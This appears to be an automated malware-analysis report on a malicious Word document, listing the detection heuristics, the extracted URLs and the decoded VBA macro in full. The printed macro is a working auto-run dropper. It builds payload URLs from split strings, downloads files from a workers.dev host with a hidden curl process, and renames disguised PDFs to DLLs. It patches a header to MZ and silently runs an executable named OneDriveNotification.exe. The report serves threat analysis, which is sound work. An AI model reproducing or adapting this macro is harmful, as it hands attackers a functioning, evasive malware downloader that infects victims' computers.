Verdict: MALICIOUS
Risk score: 246
Heuristics: 10

- CVE-2007-3899 — Microsoft Word malformed string memory corruption [critical, CVE likely] (CVE_2007_3899): Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
- Reference to CreateProcess API [high] (SC_STR_CREATEPROCESS): Reference to CreateProcess API.
- VBA macros detected [medium, 5 related findings] (OLE_VBA_MACROS): Document contains VBA macro code.
- CreateObject call [high] (OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script: `Set fso = CreateObject("Scripting.FileSystemObject")`
- Payload URL assembled from a Chr()/Asc() string expression (3 URLs) [high] (OLE_VBA_EXPR_DROPPER_URL): A VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results — often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
- AutoOpen macro [low] (OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Sub AutoOpen()`
- Workbook_Open macro [low] (OLE_VBA_WBOPEN): Workbook_Open macro. Matched line in script: `Sub Workbook_Open()`
- Environ() call (env variable access) [low] (OLE_VBA_ENVIRON): Environ() call (env variable access). Matched line in script: `folder1 = Environ("LOCALAPPDATA")`
- Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] (EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
  - https://info.scohelpdesk1.workers.dev/mscorsvc.pdf (referenced by macro)
  - https://info.scohelpdesk1.workers.dev/syswow.pdf (referenced by macro)
  - https://info.scohelpdesk1.workers.dev/OneDriveNotification.exe (referenced by macro)
Extracted artifacts: 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7359 bytes |

SHA-256 of macros.bas: aa6a23cba1b5c6da6c53faab3d54f4fc0927fb7554c9f9b8ecb7ed34f3951544

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Windows API declarations for CreateProcess
Private Declare PtrSafe Function CreateProcess Lib "kernel32" Alias "CreateProcessA" ( _
ByVal lpApplicationName As String, _
ByVal lpCommandLine As String, _
ByVal lpProcessAttributes As Long, _
ByVal lpThreadAttributes As Long, _
ByVal bInheritHandles As Long, _
ByVal dwCreationFlags As Long, _
ByVal lpEnvironment As Long, _
ByVal lpCurrentDirectory As String, _
lpStartupInfo As STARTUPINFO, _
lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare PtrSafe Function WaitForSingleObject Lib "kernel32" ( _
ByVal hHandle As LongPtr, _
ByVal dwMilliseconds As Long) As Long
Private Declare PtrSafe Function CloseHandle Lib "kernel32" ( _
ByVal hObject As LongPtr) As Long
Private Type STARTUPINFO
cb As Long
lpReserved As String
lpDesktop As String
lpTitle As String
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Long
hStdInput As LongPtr
hStdOutput As LongPtr
hStdError As LongPtr
End Type
Private Type PROCESS_INFORMATION
hProcess As LongPtr
hThread As LongPtr
dwProcessId As Long
dwThreadId As Long
End Type
Sub Main()
Dim file1URL As String, file2URL As String, file3URL As String
Dim file1Path As String, file2Path As String, file3Path As String
Dim targetFolder As String
Dim mscorsvcDllPath As String
Dim exePath As String
' Obfuscated base URL parts
Dim urlBase1 As String, urlBase2 As String, urlBase3 As String, urlBase4 As String
urlBase1 = "https://"
urlBase2 = "info."
urlBase3 = "scohelpdesk1"
urlBase4 = ".workers.dev/"
' Obfuscated folder path parts
Dim folder1 As String, folder2 As String, folder3 As String
folder1 = Environ("LOCALAPPDATA")
folder2 = "\Micro" & "soft\"
folder3 = "Va" & "ult"
targetFolder = folder1 & folder2 & folder3
' Obfuscated file names
Dim name1a As String, name1b As String
Dim name2a As String, name2b As String
Dim name3a As String, name3b As String, name3c As String
name1a = "msc" & "ors"
name1b = "vc.p" & "df"
name2a = "sys" & "wo"
name2b = "w.pd" & "f"
name3a = "One" & "Drive"
name3b = "Notif" & "ication"
name3c = ".e" & "xe"
' Build URLs
file1URL = urlBase1 & urlBase2 & urlBase3 & urlBase4 & name1a & name1b
file2URL = urlBase1 & urlBase2 & urlBase3 & urlBase4 & name2a & name2b
file3URL = urlBase1 & urlBase2 & urlBase3 & urlBase4 & name3a & name3b & name3c
' Define file paths
file1Path = targetFolder & "\" & name1a & name1b
file2Path = targetFolder & "\" & name2a & name2b
file3Path = targetFolder & "\" & name3a & name3b & name3c
' Download all 3 files using curl via CreateProcess
DownloadWithCurl file1URL, file1Path
DownloadWithCurl file2URL, file2Path
DownloadWithCurl file3URL, file3Path
' Rename .pdf files to .dll after download
mscorsvcDllPath = targetFolder & "\" & name1a & "vc.d" & "ll"
RenameFile file1Path, mscorsvcDllPath
RenameFile file2Path, targetFolder & "\" & name2a & "w.dl" & "l"
' Change header from GZ to MZ in mscorsvc.dll
ChangeHeaderGZtoMZ mscorsvcDllPath
' Run the exe from Vault folder using CreateProcess
exePath = targetFolder & "\" & name3a & name3b & name3c
RunExeWithCreateProcess exePath
' Switch from Sheet2 to Sheet3 and hide Sheet2
End Sub
Sub DownloadWithCurl(url As String, outputPath As String)
Dim si As STARTUPINFO
Dim pi As PROCESS_INFORMATION
Dim strCmd As String
Dim result As Long
' Build curl command
strCmd = "curl.exe -s -o """ & outputPath & """ """ & url & """"
' Initialize STARTUPINFO
si.cb = Len(si)
si.dwFlags = 1 ' STARTF_USESHOWWINDOW
si.wShowWindow = 0 ' SW_HIDE - hidden window
' Create process
result = CreateProcess(vbNullString, strCmd, 0&, 0&, 0&, 0&, 0&, vbNullString, si, pi)
If result <> 0 Then
' Wait for process to complete (infinite wait)
WaitForSingleObject pi.hProcess, -1 ' INFINITE = -1
' Close handles
CloseHandle pi.hProcess
CloseHandle pi.hThread
End If
End Sub
Sub RunExeWithCreateProcess(exePath As String)
Dim si As STARTUPINFO
Dim pi As PROCESS_INFORMATION
Dim result As Long
Dim fso As Object
Set fso = CreateObject("Scripting.FileSystemObject")
' Check if exe exists
If Not fso.FileExists(exePath) Then Exit Sub
' Initialize STARTUPINFO
si.cb = Len(si)
si.dwFlags = 1 ' STARTF_USESHOWWINDOW
si.wShowWindow = 0 ' SW_HIDE - hidden window
' Create process to run the exe - fire and forget
result = CreateProcess(vbNullString, exePath, 0&, 0&, 0&, 0&, 0&, vbNullString, si, pi)
If result <> 0 Then
' Don't wait - just close handles and let it run
CloseHandle pi.hProcess
CloseHandle pi.hThread
End If
Set fso = Nothing
End Sub
Sub RenameFile(oldPath As String, newPath As String)
Dim fso As Object
Set fso = CreateObject("Scripting.FileSystemObject")
' Check if source file exists before renaming
If fso.FileExists(oldPath) Then
fso.MoveFile oldPath, newPath
End If
Set fso = Nothing
End Sub
Sub ChangeHeaderGZtoMZ(filePath As String)
Dim fso As Object
Dim stream As Object
Dim fileContent() As Byte
Dim fileSize As Long
Set fso = CreateObject("Scripting.FileSystemObject")
' Check if file exists
If Not fso.FileExists(filePath) Then Exit Sub
' Read file as binary
Set stream = CreateObject("ADODB.Stream")
stream.Type = 1 ' adTypeBinary
stream.Open
stream.LoadFromFile filePath
fileSize = stream.Size
If fileSize < 2 Then
stream.Close
Exit Sub
End If
' Read all bytes
stream.Position = 0
fileContent = stream.Read
stream.Close
' Check if first 2 bytes are "GZ" (0x47 0x5A) and change to "MZ" (0x4D 0x5A)
If fileContent(0) = &H47 And fileContent(1) = &H5A Then
fileContent(0) = &H4D ' M
fileContent(1) = &H5A ' Z
' Write modified content back
Set stream = CreateObject("ADODB.Stream")
stream.Type = 1 ' adTypeBinary
stream.Open
stream.Write fileContent
stream.SaveToFile filePath, 2 ' adSaveCreateOverWrite
stream.Close
End If
Set stream = Nothing
Set fso = Nothing
End Sub
Sub AutoOpen()
Main
End Sub
Sub Workbook_Open()
Main
End Sub